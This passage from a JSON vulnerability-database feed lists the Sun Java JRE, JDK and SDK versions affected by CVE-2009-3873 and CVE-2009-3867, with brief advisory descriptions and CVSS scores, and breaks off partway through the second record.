"cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.6.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jdk:1.6.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to gain privileges via a crafted image file, related to a \"quantization problem,\" aka Bug Id 6862968.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3873", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3873"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", 
"cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", 
"cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3873", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3873", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", 
"cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Stack-based buffer overflow in the HsbParser.getSoundBank function in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via a long file: URL in an argument, aka Bug Id 6854303.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3867", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, 